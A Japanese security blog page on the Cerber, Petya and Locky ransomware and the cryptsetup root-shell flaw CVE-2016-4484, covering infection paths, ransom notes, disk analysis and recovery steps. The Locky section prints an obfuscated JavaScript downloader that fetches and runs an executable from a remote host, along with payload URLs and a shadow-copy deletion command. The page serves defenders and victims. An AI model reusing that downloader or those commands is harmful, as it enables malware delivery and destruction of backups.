ニュース

音声で脅迫するファイル暗号化ランサムウェア CERBER の対処方法

音声で脅迫するファイル暗号化ランサムウェア CERBER の対処方法

キーワード: Ransomware, ランサムウェア, 復号, 解除, 暗号化, 解除ツール, 復号ツール, Decryptor 

 

このエントリーをはてなブックマークに追加

1. CERBER 概要

スポンサーリンク

ランサムウェア(ransomware)とは、感染するとハードディスク内のファイルを勝手に暗号化して脅迫し、復号・解除キーと引き換えに金銭を要求するマルウェア(ウイルス)です。ランサムウェアには、CryptoLocker や TeslaCrypt、 Locky など多くの種類があります。これらのランサムウェアは、暗号化すると脅迫文を表示して金銭を要求するものでしたが、CERBER と呼ばれるマルウェアは音声で脅迫します。また、身代金の支払い期限が設定されており、期限が過ぎると身代金の金額を吊り上げ、支払いを迫ります。

ランサムウェア CERBER は、メール添付ファイル経由より、改ざんされたウェブサイトや広告にアクセスすることで感染するケースが多いようです。改ざんされウェブページにアクセスすると、ウェブブラウザのプラグインである Flash Player や Java などの脆弱性を攻撃するエクスプロイトキット (Magnitude Exploit Kit や Rig Exploit Kit など) を設置したサイトにリダイレクトされ、攻撃が成功すると Cerber がダウンロード実行されて感染します。

CERBER は、何度かバージョンアップされており、2016年11月末にはデータベースファイルを暗号化する機能を追加したバージョン 4.x が確認されています。トレンドマイクロの調査によると、CERBER 4.0 で暗号化対象となるデータベースファイルとしては、Microsoft Access、SQL Server, MySQL, Oracle、MySQL のほか、会計ソフト、給与計算ソフト、医療管理データベースソフトウェアに関連するファイルも含まれています。

2. CERBER による暗号化と脅迫文

CERBER に感染後のデスクトップ画面

他のランサムウェア(ransomware)と同じく、感染後にディスクトップの壁紙が脅迫文に変更されます。

cerber4

CERBER の脅迫文

脅迫文は多数の言語に対応しており、日本語に対応しています。ファイル形式は、HTML ではんく HTA 形式となっています。

cerber0

3. CEBER で暗号化されたファイルの復号方法(1回のみ)

CERBER の脅迫文に記載されているパーソナルページで、無料で 1つファイルの復号を試すことができます。

※ 購入を推奨している訳ではありません。

Tor ブラウザで脅迫文に記載されているパーソナルページにアクセスすると、言語を選択する画面が表示されます。日本語、中国語、ロシア語など多くの言語に対応しているようです。

cerber1

ロボットアクセス回避のためのキャプチャ認証が入っていました。

セキュリティ上の理由のため、以下でロボットではなく、ヒトであることを確認してください。

cerber2

メニュー画面が表示されます。支払い期限の時間などが表示されています。このページの上部に「1つのファイルを無料で復号化」というメニューがあります。

ドキュメント、写真、データベース、その他の重要なファイルは暗号化されています!

ファイルを復号するには、特別なソフトウェア - <<Cerber Decryptor>> をご購入いただく必要があります。
すべての取引は bitcoin ネットワーク内でのみ実行されます。
これから5日間だけ、B1.000の特別価格でこの製品をお求めいただけます。
5日経過後は、この製品の価格はB2.000になります。

スポンサーリンク

cerber3

上記メニューから「1つのファイルを無料で復号化」にアクセスすると、無料で1つのファイルを復号できる特別な機会!」と書かれたページが表示されます。「ファイルをアップロード」のボタンを押して、復号したいファイルを選びます。復号できるファイルは、サイズが2048バイトまでになっています。

今なら、無料で1つのファイルを復号化できる特別な機会!
サービスが本当に役に立つかどうかを確認後、<<Cerber Decryptor>> プログラムにお払い頂いた後で、1つのファイルを復号化することができます

cerber6

復号が成功すると「復号化されたファイルのダウンロード」というボタンが表示されるので、クリックしてダウンロードします。

cerber8

ダウンロードされるファイル名は Decrypted.zip となっており、解凍・展開すると復号されたファイルが確認できました。

cerber10

4. CERBER で暗号化されたファイルの復号方法

スポンサーリンク

初期の CERBER バージョン1 については、トレンドマイクロからファイルの暗号化を解除するツール( Ransomware File Decryptor )が提供されています。

5. 関連URL

LinuxディストリビューションにEnterキーを押し続けるだけで root シェルを開くことが出来る深刻な脆弱性(Cryptsetup Initrd root Shell CVE-2016-4484)

LinuxディストリビューションにEnterキーを押し続けるだけで root シェルを開くことができる深刻な脆弱性(Cryptsetup Initrd root Shell CVE-2016-4484)

       

キーワード: Linux, Ubuntu, RedHat, LUKS, cryptsetup,  initramfs(initial RAM file system), ハードディスク暗号化,

1. Cryptsetup Initrd root Shell (CVE-2016-4484) の概要

スポンサーリンク

Linuxディストリビューションで使われているハードディスク暗号化のための標準的な使用である LUKS (Linux Unified Key Setup on disk format) に深刻な脆弱性(Cryptsetup Initrd root Shell CVE-2016-4484)が見つかった。この脆弱性は、LUKSのユーティリティである cryptsetup に存在するもので、システムを起動時の認証画面で Enter キーを押し続けるだけで簡単に悪用することができる。この脆弱性を悪用するとコンソールから root シェルが起動し、ハードディスクのコピーや破壊活動、ネットワークを設定して通信などが可能となり、悪用された場合の影響は大きい。暗号化されたハードディスクの内容にはアクセスできないことはない。

影響を受けるディストリビューションには、「Red Hat Enterpise Linux」(RHEL)、「Fedora」、「Ubuntu」、「Debian」、「SLES」などが含まれる。 

物理的に直接アクセスできる図書館や空港、学校などに設置された端末、ATMなどは攻撃を受ける可能性が高い。その他、リモートでコンソール画面にアクセスできるクラウドサービスなども影響を受ける可能性がある。

スポンサーリンク

2. Cryptsetup Initrd root Shell (CVE-2016-4484)の脆弱性検証

       

(1) Ubuntu を起動すると認証画面が表示される 

ubuntu1

       

(2) 「Enter」を押して認証失敗する 

ubuntu2

       

(3)  「Enter」を押し続けて、何度か認証失敗 

ubuntu3

       

(4) initramfs(initial RAM file system)が起動

        Build-in Command として、mount や dd、ifconfig、wget など多くのコマンドが利用可能 

ubuntu4

スポンサーリンク

3. 対策

各ディストリビューションの情報を確認して、アップデートしてください。

4. 関連URL

PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア

PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア

 

スポンサーリンク

 

キーワード: PETYA、ウイルス、マルウェア、ランサムウェア、復元、復号、復旧、decrypt、MBR、MFT、ransomware, Virus

このエントリーをはてなブックマークに追加

 

目次

 
   

1. PETYA ウイルスとは

   

2. PETYA ウイルス感染時の画面

   

3. 書き換えられたMBR、MFTなど

   

4. ファイルの復旧について

   

5. 暗号化されたディスクの復号方法

 

1. PETYAウイルスとは

 

PETYAウイルスは、感染するとMBRMFT(マスターファイルテーブル)を上書きしてPCを起動不能するランサムウェアの一種です。PETYAウイルスを実行すると、Windowsが急に落ちて、システム再起動が発生します。PCを起動するとドクロマークの絵を表示した後、ハードディスクを軍事レベルのアルゴリズムで暗号化した、復号するための鍵を購入するために手続きをするように要求する文書を表示します。要求額は約0.9 BITCOINになっていました。

 

PETYA ウイルスに感染させてハードディスクの内部を確認したところ、ハードディスク全体が暗号化されている訳ではなく、MBRとMFTが部分的に書き換えられているだけのようでした。ファイルのデータは暗号化されずに残っているようです。また、軍事的なレベルのアルゴリズムで暗号化と書いてありましたが、MFTの書き換えはXOR処理のように見えます。

 

PETYAウイルスのプログラムコードを解析した訳ではなく、ハードディスクの一部を調査しただけなので正確ではないかもしれませんが、ハードディスク内のファイルデータは残っているようです。しかし、MFTが書き換えられているので、ファイル名やデータが格納されている位置(クラスタ番号)などがわからないので、ちゃんと復旧するのは大変そうです。foremost などのデータカービングソフトを使えば、ヘッダ・フッダが規定されているものについては、ある程度自動で復元できそうです。MFTレコード内に直接データが保存される小さなサイズのファイルに関しては、データが書き換えられてしまっていると思います。

 

NTFS 以外のファイルシステムの場合どうなるのかは調べられていません。

 

 

2. PETYA ウイルスに感染時の画面

 

スポンサーリンク

 

① PETYAウイルスを実行すると、強制的に Windows が落ちてシステム再起動がかかります。

 

petya_ico

 

②PCが立ち上がると、リカバリのための CHKDSKを実行しているような画面が出てきます。

 

PETAYA-1

 

③ ②が終わると、赤白点滅させながらドクロマークの絵を表示します。

 

PETYA-2PETYA-3

 

④ ハードディスクを暗号化したこと、復号するための鍵の購入方法が表示されます。

 

PETYA-4

 
   

You became victime of the PETYA RANSOMWARE!

   

The harddisks of your computer have been encrypted with an millitary grade encryption algorithm. There is no way to restore your data without a special key. You can purchase this key on the darknet page shown in step 2.

   

To purchase your key and restore your data, please follow these three easy steps:

   

1. Download the Tor Browser at “https://www.torproject.org/”. If you need help, please google for “access onion page”.

   

2. Visit one of the following pages with the Tor Browser:

   

   http://petyaXXXXXXXX

   

   http://petayaXXXXXXX

   

3. Enter your personal decryption code there:

   

   XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXX…

   

If you already purchased your key, please enter it below.

 

 

3. 書き換えられたMBR、MFTなど

 

スポンサーリンク

 

 

暗号化されたファイルの復旧する 3 つの方法を紹介します。

 

①第0ブロック MBRの書き換え

 

mbr

 

左が正常なMBR、右がPETYAに書き換えられたMBRです。オフセット 446バイト以降のパーティションテーブルは書き換えられていませんが、前半のブートストラップローダー部分が書き換えられていることがわかります。

 

 

 

②第1ブロックから第33ブロック目の書き換え

 

block1-33

 

第0ブロック目のMBR以降、第1ブロックから第33ブロック目は通常 0x00 になっていますが、PETYAウイルスによって 0x07 で XOR されているように見えます。XORとは限りませんが。

 

 

 

③ 第34ブロック目~第49ブロックまでの書き換え

 

推測ですがPETYAウイルスに感染後に表示されるドクロマークや案内を表示すると思われるプログラムが入っていました。

 

 

 

④ 第50ブロック目以降から第1パーティション直前まで

 

特に書き換えはないようです。

 

 

 

MFT(マスターファイルテーブル)の書き換え

 

MFT-Mirror

 

左が正常なMFTレコードの一部(MFTMirrのレコード)です。右はPETYAウイルスで書き換えられたMFTレコードになります。正常時の0x0の部分からキーを推測して XOR すると一部は戻せました。途中でパターンが変わるので、そのパターンをプログラム解析で確認できれば復号できそうです。

 

時間があればもう少し詳しく調べてみたいと思います。

 

 

 

4. ファイルの復旧について

 

MBR、MFTは書き換えられていますが、ファイルデータはそのまま残っているようなので、試しにファイルが取り出せるか確認してみました。

 

感染前の C:\Windows\notepad.exe が クラスタ番号 169258 から 44 クラスタ分あることが分かっていたので、感染後のハードディスクから該当部分を dd コマンドで取り出してみました。

 
   

# dd if=infected-disk.dd skip=`expr 169258 * 8 + 2048` count=`expr 44 * 8` > notepad.dd

 

notepad.exe は 179,712バイトなので、末尾の余計な部分をバイナリエディタで削って、MD5ハッシュ値を確認します。

 
   

# md5sum notepad.dd      
d378bffb70923139d6a4f546864aa61c  notepad.dd

 

感染前の C:\Windows\notepad.exe の MD5 のハッシュ値である  d378bffb70923139d6a4f546864aa61c と一致しました。少なくともこの部分のファイルデータは書き換えられてないようです。

 

 

5. 暗号化されたディスクの復号方法

 

暗号化されたディスクを復号するための解除キーを解析してくれるサイト(PETYA-PAY-NO-RANSOM)が公開されています。

 

Petya Ransomware's Encryption Defeated and Password Generator Released http://www.bleepingcomputer.com/news/security/petya-ransomwares-encryption-defeated-and-password-generator-released/

 

PETYA-PAY-NO-RANSOM(https://petya-pay-no-ransom-mirror1.herokuapp.com/)

 

上記の PETYA-PAY-NO-RANSOM を利用した PETYA RANSOM の解除を試してみました。暗号化は解除でき、正常にWindowsを起動することが確認できました。試してみた手順を紹介します。

 

PETYA-PAY-NO-RANSOM に下記①②の情報を貼り付けて「Submit」ボタンを押すと、解除キーが表示されます。このキーをPETYA RANSOMWARE のキー入力画面に、入力すると暗号化が解除されて正常にWindowsを起動することができます。

 
   

① 暗号化されたハードディスクのセクタ55 のデータをBASE64エンコードした情報

   

② 暗号化されたハードディスクのセクタ54 のオフセット 33 から 8バイト分のデータをBASE64エンコードした情報

 

上記①②の情報を取得するためのツール Petya Sector Extractor が下記URLで提供さてれています。  Windows 上で動作するGUI プログラムです。

 

http://download.bleepingcomputer.com/fabian-wosar/PetyaExtractor.zip

 

今回は、別途 Windows マシンにHDDをつなぎかえるのが面倒だったため、上記 Petaya Sector Extractor は使わずに、Bootable Linux CD でブートして dd コマンドと Base64 コマンドで取得する方法にしました。

 

 

(1) Bootable Linux CD で PETYA RANSOMWARE に感染したマシンを起動します

 

Bootable Linux なら何でも良いのですが、今回は Deft Linux を使いました。

 

 

(2) Linux が起動したら下記のコマンドを実行して①②の情報を取得します

 

感染したマシンのハードディスクが、デバイス名 /dev/sda として認識されています。この /dev/sda から該当データを取得することになります。下記、具体的なコマンドになります。

 

①の暗号化されたハードディスクのセクタ55 のデータをBASE64エンコードした情報を取得

 
   

deft ~ % dd if=/dev/sda bs=512 skip=55 count=1 2>/dev/null | base64      
/cc3NxMWNzenSDc3rzs3N+37Nzfq/zc3baU3NyfGNzc3BTc3N8g3N1RtNzdJoTc3K6M3N6tgNzft      
1zc33P03N/7HNzeTFjc3p7Q3N6/9NzftvDc37P83N+3lNzcn2Dc3NTU3N7c3NzdUbTc3SaI3N6um       
NzerZDc3bSg3N9z9Nzf9xzc3E1Y3N6cMNzcvfTc37fw3N+r/NzdtZTc3J8Q3NzMHNzc3iDc3Um03       
N8miNzerIzc3q343N+36Nzff/Tc3/cc3N5NVNzenoDc3r7s3N+07Nzfq/zc3bSU3NyfGNzcxMTc3       
N/c3N1JtNzdJIjc3K6M3N6tkNzdtqDc33/03N/7HNzcT1Tc3pxQ3N687Nzdtujc37P83N+0lNzcn       
2Dc3PzU3N7cINzdTbTc3yWI3N6ulNzerfDc37Tk3N9/9Nzf8xzc3ExY3N6cONzevfDc3bTs3N+r/       
NzdtZTc3J8I3Nz0HNzc3CDc3VW03N0nhNzcrpTc3q2A3N226Nzfe/Tc3/cc3N5NWNzenADc3L/03       
N+38Nzfq/zc3bWU3NyfENzc7PTc3N0g3N1NtNzdJojc3qyM3N6t+Nzdt+Tc33/03N/vHNzeTFjc3       
pww3N688NzftOzc36v83N20lNzcnwjc3OT03NzfINzdSbTc3SeE3NyulNzerYDc3bbo3N979Nzc=

 

②の暗号化されたハードディスクのセクタ54 のオフセット 33 から 8バイト分のデータをBASE64エンコードした情報を取得

 
   

deft ~ % dd if=/dev/sda bs=1 skip=`expr 33 \+ 512 \* 54` count=8 2>/dev/null | base64      
LSgLXoh++aQ=

 

上記コマンド結果を USB メモリや SSH などのネットワーク経由で取得し保存しておきます。

 

 

(3) (2) で得た情報を「PETYA-PAY-NO-RANSOM(https://petya-pay-no-ransom-mirror1.herokuapp.com/)」のフォームに貼り付けて Submit します

 

decrypt1

 

しばらくすると解除キーが表示されます。ここでは Your key is: の行にある「XxNxRx3xExTxTxsx」が解除キーになります。

 

decrypt2

 

 

(4) (3)で表示された解除キーを PETYA の画面に入力します

 

decrypt4

 

解除キーを入力すると、復号処理が実行されます。

 

decrypt5

 

しばらくすると復号処理が完了すると、マシン再起動の表示が出ます。

 

decrypt6

 

再起動すると正常にWindowsが起動します。

 

 

 

スポンサーリンク

Locky Virus - 日本語で身代金要求するランサムウェアウイルスの対処方法

更新日:
2016-03-29 「感染しないための対策」を追記
2016-03-27 「感染時の動作」、「Locky Decrytor の購入画面」をを追記

Locky Virus - 日本語で身代金を要求するランサムウェアウイルスの対処方法

キーワード: ウイルス、Locky、マルウェア、ランサムウェア、復元、復号、復旧、decrypt, js、javascript、Document2、ransomware, virus, thor, osiris, zzzzz, aesir

このエントリーをはてなブックマークに追加 

目次

1. Locky ウイルスとは

2. 脅迫文

3. 暗号化されたファイルの復旧方法

4. メール添付ファイルの例

5. Locky ウイルスのダウロードURL

6. Locky ウイルス感染時の動作

7. 感染しないための対策

8. 関連リンク

スポンサーリンク

1. Locky ウイルスとは

Locky ウイルスは、感染するとPC内のファイル(テキストやオフィスファイル、画像、動画ファイルなど)を勝手に暗号化してしまうランサムウェアと言われる種類のウイルスです。暗号化されたファイルは、拡張子が「Locky」 となってしまうことから通称「Locky」と呼ばれています。今までのランサムウェアの脅迫文は日本語対応していないものがほとんどでしたが、Locky は日本語環境であれば日本語の脅迫文を作成して表示します。

感染経路としては、メール添付ファイルと脆弱性を攻撃するWebサイトの大きく2つがあります。メール添付ファイルでの感染は、実行すると Locky ウイルスをダウンロードして実行する JavaScriptファイルが含まれた ZIP ファイルが添付されているケースが多いです。その他 rar 拡張子の添付ファイルのケースもあります。また、改ざんされたWebサイトでの感染では、そのWebサイトを見ると Adobe Flash などの脆弱性を攻撃して自動的に Locky Virus をダウンロードして実行する手法(ドライブバイダウンロード)による感染が多く報告されています。このWebサイト経由での感染は、Adobe Flash や IE などのソフトウェアを最新にしておけば感染することはほどんどありません。ランサムウェアなどのウイルスに感染しないように、必ずソフトウェアはアップデートして最新のバージョンにしておきましょう。

1.2. Locky 亜種

Locky ウイルスが出現して間もなく亜種が出回りはじめました。Locky亜種は、初期のLocky と比べて、ダウンロードされるウイルス本体の実行ファイル形式(EXEからDLL形式)や暗号化後のファイル名の形式、拡張子名(.thor.aesir.zzzzz.osirisなどが変わっています。目的はかわらず、感染PC内のファイルを暗号化して人質にして、身代金(ビットコイン支払い)を要求することです。

Locky亜種は、主にメールの添付ファイルとして送られてきます。添付されるファイルの形式は、以下が確認されています。

添付ファイルの形式 ファイルの拡張子
zip zip
The Witcher 2 Game Archive dzip
Microsoft Office doc, docx, docm
  xls, xlsx

zip, dzip などの圧縮ファイルは、展開すると js, wsf, vbs などのスクリプトファイルが入っており、実行してしまうと Locky 亜種の本体であるDLLプログラムをダウンロードして実行します。

doc, docm などのMicrosoft Office のオフィスファイルには、開くと Locky亜種をダウンロードするマクロが入っています。

2. 脅迫文

Locky ウイルスに感染すると表示される日本語の脅迫文です。
  • _Locky_recover_instructions.bmp

_Locky_recover_instructions

  • _Locky_recover_instructions.txt

!!! 重要な情報 !!!!

すべてのファイルは、RSA-2048およびAES-128暗号で暗号化されています。  
RSAの詳細については、ここで見つけることができます:  
http://ja.wikipedia.org/wiki/RSA暗号  
hxxp://ja.wikipedia.org/wiki/Advanced_Encryption_Standard

あなたのファイルの復号化は秘密鍵でのみ可能であり、私たちの秘密のサーバー上にあるプログラムを、復号化します。  
あなたの秘密鍵を受信するには、リンクのいずれかに従います:  
1. hxxp://i3ezlvkoi7fwyood.tor2web.org/AAF92AC11ABCDEF  
2. hxxp://i3ezlvkoi7fwyood.onion.to/AAF92AC11ABCDEF  
3. hxxp://i3ezlvkoi7fwyood.onion.cab/AAF92AC11ABCDEF

このすべてのアドレスが使用できない場合は、次の手順を実行します。  
1. ダウンロードして、Torのブラウザをインストールします: hxxps://www.torproject.org/download/download-easy.html  
2. インストールが正常に完了したら、ブラウザを実行し、初期化を待ちます。  
3. アドレスバーにタイプ: i3ezlvkoi7fwyood.onion/AAF92AC11ABCDEF  
4. サイトの指示に従ってください。

!!! 個人識別ID: AAF92AC11ABCDEF !!!

  • Locky Decryptor 購入画面

暗号化されたファイルを復元するためのソフトウェアである Locky Decryptor の要求額は 1.0 Bitcoin のようです。日本円に換算すると5万円弱くらいでしょうか。暗号化されたファイルの重要性によっては、払ってしまいそうな金額です。

脅迫文と同じく、英語、日本語のほか、韓国語、ドイツ語、フランス語、イタリア語など多くの言語をサポートしています。

身代金を払うことは、犯罪者にお金を払ってしまうことになってしまいますし、犯罪を助長することになってしまうのでお勧めしませんが、バックアップなどから復旧できない大切なデータが被害にあった場合は、身代金を払って復号するしか手はなさそうです。

LockyDecryptor 

3. 暗号化されたファイルの復旧方法

スポンサーリンク

暗号化されたファイルの復旧する 3 つの方法を紹介します。

(1) バックアップから復旧

バックアップから復旧することが一番簡単な方法です。ランサムウェアの被害に限らず、インシデントが発生するとバックアップの大切さがわかります。

(2) ボリュームシャドーコピーからの復旧

Vista/7 以降のWindowsは、標準でファイルの自動バックアップサービスが動いています。ファイルのプロパティのタブで「以前のバージョン」で表示されるものがバックアップされたファイルになります。

いつの時点のボリュームシャドーコピーがあるかなどを確認する方法です。管理者権限のコマンドプロンプトで、vssadmin か wmic コマンドを実行すると表示されます。その他、エクスプローラのフォルダやファイルのプロパティから「以前のバージョン」タブを確認する方法もあります。

> vssadmin list shadows

> wmic.exe shadowcopys

ボリュームシャドーコピーが残っていれば、Shadow Explorer というソフトウェア(http://www.shadowexplorer.com/)を使うことで以前のバージョンのファイルを復元することができます。

Locky ウイルスは、感染時にボリュームシャドーコピーを削除するコマンドを実行します。このコマンドには管理者権限が必要なので、一般ユーザ権限で操作をしていたのであれば削除されずに残っている可能性があります。

(3) アンチウイルスベンダーの復号ツールを使う(未確認)

本当に復号できるのか確認検証できていませんが、下記URL に Locky ウイルスに暗号化されたファイルを復元する方法が記載されています。

How to Decrypt Files Affected by Locky

http://www.im-infected.com/virus/remove-locky-ransomware-virus-removal.html

DrWeb の FTP サイトに復号ツール(ftp://ftp.drweb.com/pub/drweb/tools/te94decrypt.exe)があるようですが、認証が必要でダウンロードできませんでした。DrWeb を購入しているユーザのみに公開されているのかもしれません?。DrWeb のライセンスを持っていないので詳細は不明です。

このツールを使って下記コマンドを実行することにより復号できるようです。(確認できていないので、本当に復元できるか不明です)

te94decrypt.exe -k 85

上記コマンドで復号できない場合は、-k オプションの値を -k 87, -k 88, -k 90, -k 106, or –k186 のように変えて試すとよいようです。

(4) 身代金を支払う

最後の手段ですね。

スポンサーリンク

4. メール添付ファイルの例

Locky ウイルスをダウンロードする JavaScript ファイル (ZIP 圧縮ファイル)を添付したメールの一例です。以下、Locky ウイルスに関するメールの特徴です。

  • 件名は Document 2 が多い
  • 差出人と宛先が自分のメールアドレス
  • 本文はなしが多い
  • 添付ファイルは zip で Locky Virus をダウンロードする js ファイルが含まれている

 

4.1 メール添付ファイルの例

  • Scanned images

件名 Scanned image
差出人 "admin" lands804@nifty.com
日時 Fri, 11 Mar 2016 21:28:25 +0530 (IST India Standard Time)
X-Mailer Internet FAX, MGCS
本文 Image data in PDF format has been attached to this email.
添付ファイル 11-03-2016-0424109259.zip (LUH5654603905.js)

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Fri, 18 Mar 2016 07:36:24 –0500 (EST アメリカ東部)
X-Mailer なし
本文 なし
添付ファイル Document 2.zip (中身は SKS6515937204.js)

  • Message from KFBT_C125

件名 Message from KFBT_C125
差出人 copier@nifty.com
日時 Date: Mon, 21 Mar 2016 10:01:42 -0700 (US,カナダ, メキシコ)
X-Mailer KONICA MINOLTA
本文 なし
添付ファイル SKFBT_C0125690141.zip

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 16:40:13 +0530 (IST India Standard Time インド)
X-Mailer iPhone Mail (13B143)
本文 なし
添付ファイル Document 2.zip (中身は FAM6542645213.js)

  • Document 2

  
件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 16:45:47 +0530 (IST India Standard Time インド)
X-Mailer iPhone Mail (13B143)
本文 なし
添付ファイル Document 2.zip (中身は QVR3975568919.js)

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 13:21:42 +0700 (ロシア?)
X-Mailer iPhone Mail
本文 なし
添付ファイル Document 2.zip

  • Locky をダウンロードする Javascript の例(一部)

LUH5654603905.js (一部)

LnOKenpxqU = "If the nodes are siblings, we can do a quick check} else if ( aup === bup ) {return siblingCheck( a, b );";
String.prototype.harmonize = function () { return this.substr(0, 1); };
var zooFq = [("through","sesame","admissions","holes","T")+("scripts","beautify","attacked","arrangements","OQ")+("algeria","cucumber","relation","NF")+"JjAV"+"sY", "c"+("sponsorship","endorsed","finish","JbVL")+"Lh"+"xN", "Expan"+"dE"+"nviron"+"me"+"ntStri"+("stork","sluggish","foxes","ngs"), ""+"%"+("prominent","queens","foregone","susanna","TE")+"MP%", "/BhyIDtNVwP" + ""+"."+("revolve","meyer","shift","reborn","exe"), "R"+("medline","demur","arbitrator","un"), ("tumbler","dense","A")+("craig","repine","tramadol","ct")+"iv"+"eX" + ("compression","brewery","guitar","")+"O"+"bj"+"ect", "QGGOKcpS", "QwMELac", "W"+"Sc"+"ri"+("foxes","torture","pt.") + ("problem","inscribe","melissa","octave","S"), "DKiwgen", ""+("withering","andrew","shorter","h")+"ell", "pVfOLaUink", ("throttle","cowboy","")+("amalgamation","breast","u")+"gb"+"IRD", ""+("guarantee","breastplate","interpreted","M")+"SX"+"ML2" + "."+"XM"+"LH"+("freeze","pounce","immensity","taciturnity","TTP")];
WeuTVCqwr = "Otherwise nodes in our document sort firstap[i] === preferredDoc ? -1 :bp[i] === preferredDoc ? 1 :0;};";   
zooFq.splice(7,2);   
var CTMoXJF = this[zooFq[7 * 8 - 50]];   
HWKBtgugje = "QADrAWHk";   
midnight = (("deleterious", "greenish", "bpRCgjnvY", "astuteness", "pxoHjzpzAa") + "FCIzdg").harmonize()   
publicitys = (("compared", "cheaper", "QBuFHmOIr", "architects", "shvjRYg") + "FjirdbbvG").harmonize()   
zooFq[7] = zooFq[7] + zooFq[9];   
zooFq[8] = "WyGszYG";   
zooFq.splice(8,3);   
var SjBMgLMBX = new CTMoXJF(zooFq[7]);   
SEVPbSzi = "}Walk down the tree looking for a discrepancywhile ( ap[i] === bp[i] ) {i++;";   
var ivPMRM = new CTMoXJF(zooFq[9]);   
rfQhFwb = "}Otherwise we need full lists of their ancestors for comparisoncur = a;while ( (cur = cur.parentNode) ) {ap.unshift( cur );}cur = b;while ( (cur = cur.parentNode) ) {bp.unshift( cur );";   
var giLwRPLp = SjBMgLMBX[zooFq[2]](zooFq[3]) + zooFq[4];   
SWlMAsjacQk = "}return i ?Do a sibling check if the nodes have a common ancestorsiblingCheck( ap[i], bp[i] ) :";   
ivPMRM.onreadystatechange = function () {   
if (ivPMRM[("animal","ferment","wince","r")+"ea"+("drummer","delicious","romany","thinking","dy")+"st"+("contributor","society","projects","oxygen","ate")] === 4) {   
   var aLcJyART = new CTMoXJF(""+"A"+("outlawed","mined","national","DO")+("derek","elizabethan","cleave","whisk","DB.")+("protuberance","stayed","proverbs","")+("terminus","dunno","madness","graphic","S")+"tr"+"eam");   
   aLcJyART.open();   
   KHvCvfBJOh = " return document; };";  

try {

LNqWai= "IE 9\"s matchesSelector returns false on disconnected nodesif ( ret || support.disconnectedMatch ||  As well, disconnected nodes are said to be in a document  fragment in IE 9 elem.document && elem.document.nodeType !== 11 ) {return ret;}} catch (e) {}";   
ivPMRM.open(("symptom","sigma","colin","G")+"ET", "h"+("propagate","thrown","johnny","ttp:")+"//"+("mohawk","impair","chinhu")+"an"+"oi"+"that.c"+"om/s"+"ys"+"te"+"m/logs/u"+"y78hn6"+("hogshead","action","54")+"e.exe", false);BxpYFBq = "} return Sizzle( expr, document, null, [ elem ] ).length > 0; };";   
ivPMRM[publicitys + ("illogical","quick-witted","grape","xerox","e") + (("promote", "moderately", "gnuUtaRFBS", "viscid", "impure", "nYAgsnHqfY") + "DudCuStvIn").harmonize() + (("miner", "squeal", "IKcQRgYhT", "blame", "concord", "dNdviLv") + "crpvqd").harmonize()]();   
RqrXhxjRF = "Sizzle.contains = function( context, elem ) {Set document vars if neededif ( ( context.ownerDocument || context ) !== document ) {setDocument( context );}return contains( context, elem ); };";   
SjBMgLMBX[zooFq[5]](giLwRPLp, 1, "qPdBvBqXfEO" === "HtIxotr"); xcwJYtK = " return val !== undefined ?val :support.attributes || !documentIsHTML ?elem.getAttribute( name ) :(val = elem.getAttributeNode(name)) && val.specified ?val.value :null; };";   
lrGyXANbYvX = "Sizzle.attr = function( elem, name ) {Set document vars if neededif ( ( elem.ownerDocument || elem ) !== document ) {setDocument( elem );";   
} catch (RaRfcWCIw) { };   
xyQVrCFOYxk = "} var fn = Expr.attrHandle[ name.toLowerCase() ],Don\"t get fooled by Object.prototype properties (jQuery #13807)val = fn && hasOwn.call( Expr.attrHandle, name.toLowerCase() ) ?fn( elem, name, !documentIsHTML ) :undefined;";

5. Locky ウイルスのダウロードURL

メールに添付された zip ファイルに含まれる js ファイルを実行すると HTTP アクセスして、Locky Virus をダウンロード実行します。HTTPアクセス先 URL の一例です。

hxxp://timefusewatches.com/system/logs/3523523.exe
hxxp://palat.com/system/logs/98h7b66gb.exe
hxxp://palahasit.com/system/logs/98h7b66gb.exe

/system/logs/*.exe となっているURLが多いようです。

6. Locky ウイルス感染時の動作

メール経由(js を含む添付ファイル)での感染時の動作です。感染してファイルを暗号化された後は、Locky Virus は自身を削除してしまうため残っていません。このため、暗号化された後に、アンチウイルスソフトウェアでフルスキャンしても見つかりません。メール添付されていた zip or Javascript は残っているので、これらが検知されることはあるかもしれません。

  1. Locky Virus をダウンロードするための Javascript を圧縮した zip ファイルを添付したメールが届く
  2. 添付された zip を開いて Javascript ファイル( 例: LUH5654603905.js)を実行すると、Locky Virus である実行ファイルがダウンロード実行される
  3. Volume Shadow Copy サービスで自動バックアップされているファイルをコマンドで削除する「C:\Windows\System32\wbem\WMIC.exeshadowcopydelete/nointeractive」
  4. Locky C2 (コントロール&コマンド)サーバに通信して暗号化に関する情報をやり取り (hxxp://xxxxxxx/main.php、hxxp://xxxxxxx/gate.php へのPOST通信が多い)
  5. ファイルの暗号化処理
  6. 脅迫文を作成して表示
  7. Locky Virus の実行ファイルを削除 「"C:\Windows\system32\cmd.exe" /c DEL %USERPROFILE%\DOCUME~1\TWRPUI~1.EXE」
             

7. 感染しないための対策

  • Adobe Flash Player を最新バージョンにアップデートする
  • Adobe Reader を最新バージョンにアップデートする
  • Java を最新バージョンにアップデートする
  • Internet Explorer を最新バージョンにアップデートする
  • Windows Update のセキュリティパッチをすべて適用する
  • アンチウイルスソフトの最新パターンにアップデートし、リアルタイム検知を有効にする
  • 問題なければ .js 拡張子の関連付けを、Javascript が実行できないプログラム(例えばnotepad.exe など)に変更する
  • js, wsf, vbs などの関連付けを無効にする
  • js, wsf, vbs などに関連付けられた WScript.exe をグループポリシーや権限などで実行禁止する
  • Microsoft Office のマクロ設定を警告表示もしくは無効にする

各種ソフトウェアやプラグインが最新バージョンになっているかは、情報処理推進機構 IPA が提供している MyJVN パージョンチェッカー(http://jvndb.jvn.jp/apis/myjvn/vccheck.html)で確認できます。

8. 関連リンク

アノニマスによるサイバー攻撃の被害まとめ #OpKillingBay

更新情報:    
2016-10-28: 和歌山県伊都郡高野町へのDDoS攻撃を追加 

アノニマスによるサイバー攻撃の被害まとめ #OpKillingBay 

